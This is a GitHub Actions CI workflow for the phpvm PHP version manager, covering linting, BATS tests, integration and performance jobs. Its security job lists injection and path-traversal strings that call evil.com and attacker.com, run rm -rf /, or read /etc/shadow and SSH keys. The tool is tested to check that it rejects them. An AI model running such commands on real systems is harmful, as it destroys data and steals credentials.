-
-
Notifications
You must be signed in to change notification settings - Fork 9
525 lines (444 loc) Β· 16.9 KB
/
ci.yml
File metadata and controls
525 lines (444 loc) Β· 16.9 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
name: CI Pipeline
on:
push:
branches: [main, development, 'fix/**', 'feature/**']
pull_request:
branches: [main, development]
workflow_dispatch:
schedule:
# Weekly comprehensive tests including security scans (Mondays at 2 AM UTC)
- cron: '0 2 * * 1'
jobs:
# =============================================================================
# QUICK CHECKS - Fast-fail static analysis
# =============================================================================
quick-checks:
name: 'Quick Checks (Syntax, Lint, Format)'
runs-on: ubuntu-latest
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Shell Syntax Check
run: |
echo "=== Checking Shell Syntax ==="
bash -n phpvm.sh
if [ -f install.sh ]; then bash -n install.sh; fi
echo "β Syntax check passed"
- name: Install Tools
run: |
sudo apt-get update
sudo apt-get install -y shellcheck
wget -O shfmt https://github.com/mvdan/sh/releases/download/v3.12.0/shfmt_v3.12.0_linux_amd64
chmod +x shfmt
sudo mv shfmt /usr/local/bin/
- name: ShellCheck Analysis
run: |
echo "=== Running ShellCheck ==="
shellcheck -f gcc phpvm.sh install.sh || exit 1
echo "β ShellCheck passed"
- name: Code Formatting Check
run: |
echo "=== Checking Code Formatting ==="
shfmt -d -i 4 -sr phpvm.sh install.sh || {
echo "β Code formatting issues detected!"
echo "Run 'make format' locally to fix."
exit 1
}
echo "β Formatting check passed"
- name: Code Quality Checks
run: |
echo "=== Checking Code Quality ==="
# Check for trailing whitespace
if grep -n '[[:space:]]$' phpvm.sh install.sh 2>/dev/null; then
echo "β Trailing whitespace found"
exit 1
fi
# Check for tabs (should use spaces)
if grep -P '\t' phpvm.sh install.sh 2>/dev/null; then
echo "β Tabs found - please use spaces"
exit 1
fi
echo "β Code quality checks passed"
# =============================================================================
# SECURITY TESTING
# =============================================================================
security:
name: 'Security Testing'
runs-on: ubuntu-latest
needs: quick-checks
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Security-focused ShellCheck
run: |
sudo apt-get update
sudo apt-get install -y shellcheck
echo "=== Security-focused Shell Analysis ==="
shellcheck -f gcc -S error phpvm.sh || true
# Check for unsafe patterns
echo "Checking for potential security issues..."
if grep -n "eval" phpvm.sh; then
echo "β Found eval usage - review for security"
fi
if grep -n "rm -rf \$" phpvm.sh; then
echo "β Found variable-based rm -rf - review for safety"
fi
if grep -n "sudo.*\$" phpvm.sh | grep -v "run_with_sudo"; then
echo "β Found direct sudo with variables - review for safety"
fi
- name: Input Validation Security Test
run: |
chmod +x ./phpvm.sh
echo "=== Testing Input Validation Security ==="
malicious_inputs=(
"8.1; rm -rf /"
"8.1 && curl http://evil.com"
"8.1 | nc attacker.com 1234"
"\$(whoami)"
"\`id\`"
"8.1 > /etc/passwd"
"8.1; cat /etc/shadow"
"../../../etc/passwd"
"8.1 || wget http://evil.com/script.sh -O - | sh"
)
for input in "${malicious_inputs[@]}"; do
echo "Testing malicious input: $input"
if ./phpvm.sh install "$input" 2>/dev/null; then
echo "β SECURITY ISSUE: Accepted malicious input: $input"
exit 1
else
echo "β Correctly rejected: $input"
fi
done
- name: Path Traversal Security Test
run: |
echo "=== Testing Path Traversal Protection ==="
mkdir -p security_test
path_traversal_inputs=(
"../../../etc/passwd"
"../../root/.ssh/id_rsa"
"/etc/shadow"
"..\\..\\windows\\system32\\config\\sam"
"....//....//etc//passwd"
)
for input in "${path_traversal_inputs[@]}"; do
echo "$input" > security_test/.phpvmrc
cd security_test
if ../phpvm.sh auto 2>/dev/null; then
echo "β SECURITY ISSUE: Accepted path traversal: $input"
exit 1
else
echo "β Correctly rejected path traversal: $input"
fi
cd ..
done
- name: Additional Security Tests
run: |
chmod +x ./phpvm.sh
echo "=== Buffer Overflow & Input Length Tests ==="
very_long_input=$(printf 'A%.0s' {1..1000})
if ./phpvm.sh install "$very_long_input" 2>/dev/null; then
echo "β SECURITY ISSUE: Accepted extremely long input"
exit 1
else
echo "β Correctly rejected extremely long input"
fi
echo "=== File Permission Security ==="
mkdir -p perm_test
echo "8.1" > perm_test/.phpvmrc
chmod 777 perm_test/.phpvmrc
cd perm_test
../phpvm.sh auto || echo "β Handled world-writable .phpvmrc"
cd ..
echo "=== Checking for Hardcoded Secrets ==="
if grep -iE "(password|secret|api.*key|auth.*token)" phpvm.sh | grep -v "^#"; then
echo "β Found potential secret patterns - review"
fi
echo "β Security tests completed"
# =============================================================================
# BATS TEST SUITE
# =============================================================================
bats-tests:
name: 'BATS Tests (${{ matrix.os }})'
runs-on: ${{ matrix.os }}
needs: quick-checks
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest]
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Install BATS
run: |
if [ "${{ runner.os }}" = "macOS" ]; then
brew install bats-core
else
sudo apt-get update
sudo apt-get install -y bats
fi
- name: Run BATS Test Suite
run: |
echo "=== Running BATS Test Suite ==="
bats tests/ -t
- name: Upload Test Results
if: always()
uses: actions/upload-artifact@v4
with:
name: bats-results-${{ matrix.os }}
path: test-results/
retention-days: 30
# =============================================================================
# CORE FUNCTIONALITY TESTS
# =============================================================================
core-tests:
name: 'Core Functionality (${{ matrix.os }})'
runs-on: ${{ matrix.os }}
needs: quick-checks
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest]
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Homebrew (Linux)
if: runner.os == 'Linux'
run: |
sudo apt-get update
sudo apt-get install -y build-essential curl file git
NONINTERACTIVE=1 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
echo 'eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"' >> ~/.bashrc
eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
brew --version
- name: Make Script Executable
run: chmod +x ./phpvm.sh
- name: Test Version Commands
run: |
echo "=== Testing Version Commands ==="
./phpvm.sh version
./phpvm.sh --version
./phpvm.sh -v
echo "β All version commands work"
- name: Test Basic Commands
run: |
echo "=== Testing Basic Commands ==="
./phpvm.sh help
./phpvm.sh list || echo "List executed"
./phpvm.sh info
echo "β Basic commands work"
- name: Test Error Handling
run: |
echo "=== Testing Error Handling ==="
# Invalid command
if ./phpvm.sh invalid_command 2>/dev/null; then
echo "β Should have failed on invalid command"
exit 1
else
echo "β Correctly handles invalid commands"
fi
# Missing version parameter
if ./phpvm.sh use 2>/dev/null; then
echo "β Should have failed on missing version"
exit 1
else
echo "β Correctly handles missing version parameter"
fi
- name: Test .phpvmrc Auto-Switch
run: |
echo "=== Testing .phpvmrc Auto-Switch ==="
mkdir -p test_project
echo "8.3" > test_project/.phpvmrc
cd test_project
if [[ "${{ runner.os }}" == "Linux" ]]; then
eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)" 2>/dev/null || true
fi
../phpvm.sh auto || echo "Auto-switch attempted"
cd ..
echo "β Auto-switch test completed"
- name: Performance Check
run: |
echo "=== Performance Check ==="
time ./phpvm.sh version >/dev/null
time ./phpvm.sh help >/dev/null
time ./phpvm.sh list >/dev/null
echo "β Performance check completed"
# =============================================================================
# PHP INSTALLATION & INTEGRATION TESTS
# =============================================================================
php-integration:
name: 'PHP Integration (${{ matrix.os }})'
runs-on: ${{ matrix.os }}
needs: [bats-tests, core-tests]
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest]
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Homebrew (Linux)
if: runner.os == 'Linux'
run: |
sudo apt-get update
sudo apt-get install -y build-essential curl file git
NONINTERACTIVE=1 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
echo 'eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"' >> ~/.bashrc
eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
- name: Test Installation Script
run: |
echo "=== Testing install.sh ==="
bash -n install.sh
# Verify install script components
grep -q "uname" install.sh && echo "β OS detection present"
grep -qE "curl|wget" install.sh && echo "β Download mechanism present"
grep -q "chmod" install.sh && echo "β Permission setting present"
- name: Test PHP Installation Flow
run: |
chmod +x phpvm.sh
if [[ "${{ runner.os }}" == "Linux" ]]; then
eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
fi
echo "=== Testing PHP Installation ==="
./phpvm.sh install 8.3 || echo "PHP 8.3 installation attempted"
./phpvm.sh use 8.3 || echo "Switch to 8.3 attempted"
./phpvm.sh list
./phpvm.sh system || echo "System switch attempted"
- name: Test Project Workflow
run: |
if [[ "${{ runner.os }}" == "Linux" ]]; then
eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
fi
echo "=== Testing Project Workflow ==="
mkdir -p test_project
echo "8.3" > test_project/.phpvmrc
cd test_project
../phpvm.sh auto || echo "Auto-switch attempted"
cd ..
- name: Test Error Recovery
run: |
echo "=== Testing Error Recovery ==="
# Corrupted state
mkdir -p ~/.phpvm
echo "corrupted_data" > ~/.phpvm/active_version
./phpvm.sh list || echo "β Handled corrupted state"
# Missing directories
rm -rf ~/.phpvm/versions 2>/dev/null || true
./phpvm.sh list || echo "β Handled missing directories"
# Invalid .phpvmrc
mkdir -p error_test
printf '\x00\x01\x02' > error_test/.phpvmrc
cd error_test
../phpvm.sh auto 2>/dev/null || echo "β Handled binary .phpvmrc"
cd ..
# =============================================================================
# EXTENDED TESTS - Multi-Distribution (Scheduled only)
# =============================================================================
multi-distro:
name: 'Multi-Distribution (${{ matrix.scenario }})'
runs-on: ubuntu-latest
needs: quick-checks
if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch' || (github.event_name == 'push' && github.ref == 'refs/heads/main')
strategy:
fail-fast: false
matrix:
include:
- distro: ubuntu:22.04
scenario: 'Ubuntu 22.04 LTS'
- distro: ubuntu:24.04
scenario: 'Ubuntu 24.04 LTS'
- distro: debian:12
scenario: 'Debian 12'
- distro: fedora:39
scenario: 'Fedora 39'
- distro: alpine:3.19
scenario: 'Alpine 3.19'
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Run Tests in Container
run: |
if [[ "${{ matrix.distro }}" == alpine* ]]; then
SHELL_CMD="sh"
else
SHELL_CMD="bash"
fi
docker run --rm -v $PWD:/workspace -w /workspace ${{ matrix.distro }} $SHELL_CMD -c "
echo '=== Testing on ${{ matrix.scenario }} ==='
# Install basic tools
if command -v apt-get >/dev/null 2>&1; then
apt-get update && apt-get install -y bash curl
elif command -v dnf >/dev/null 2>&1; then
dnf install -y bash curl
elif command -v apk >/dev/null 2>&1; then
apk add --no-cache bash curl
fi
# Test syntax
bash -n phpvm.sh || exit 1
# Test basic commands
chmod +x phpvm.sh
./phpvm.sh version || exit 1
./phpvm.sh help >/dev/null || exit 1
echo 'β All tests passed for ${{ matrix.scenario }}'
"
# =============================================================================
# PERFORMANCE TESTING (Scheduled only)
# =============================================================================
performance:
name: 'Performance & Load Testing'
runs-on: ubuntu-latest
needs: quick-checks
if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch' || (github.event_name == 'push' && github.ref == 'refs/heads/main')
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Performance Benchmarks
run: |
chmod +x ./phpvm.sh
echo "=== Performance Testing ==="
# Startup time
echo "Measuring startup time (10 iterations):"
for i in {1..10}; do
time ./phpvm.sh version >/dev/null
done
# Concurrent operations
echo "Testing 20 concurrent operations:"
for i in {1..20}; do
./phpvm.sh version >/dev/null &
done
wait
echo "β Performance tests completed"
# =============================================================================
# QUALITY GATE - Final validation
# =============================================================================
quality-gate:
name: 'Quality Gate β
'
runs-on: ubuntu-latest
needs: [quick-checks, security, bats-tests, core-tests, php-integration]
if: always()
steps:
- name: Check All Required Jobs
run: |
echo "=== Quality Gate Validation ==="
if [ "${{ needs.quick-checks.result }}" != "success" ]; then
echo "β Quick checks failed"
exit 1
fi
if [ "${{ needs.security.result }}" != "success" ]; then
echo "β Security tests failed"
exit 1
fi
if [ "${{ needs.bats-tests.result }}" != "success" ]; then
echo "β BATS tests failed"
exit 1
fi
if [ "${{ needs.core-tests.result }}" != "success" ]; then
echo "β Core tests failed"
exit 1
fi
if [ "${{ needs.php-integration.result }}" != "success" ]; then
echo "β PHP integration tests failed"
exit 1
fi
echo "β
All quality checks passed!"
echo "β
CI pipeline successful!"